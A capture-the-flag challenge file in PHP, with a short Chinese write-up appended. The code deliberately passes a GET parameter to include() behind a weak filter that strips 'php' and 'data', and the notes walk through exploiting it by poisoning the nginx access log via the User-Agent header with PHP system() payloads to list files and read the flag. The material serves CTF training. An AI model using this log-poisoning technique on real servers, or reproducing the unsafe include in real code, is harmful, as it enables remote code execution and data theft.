<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-16 11:26:29
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
过滤了php,data,其他伪协议都用不了
考虑用日志文件包含
GET
?file=/var/log/nginx/access.log
User-Agent
<?php system('ls');?>
可能要发几次才能出来
然后再换
<?php system('cat fl0g.php');?>
但页面上 仍然没有flag,查看源代码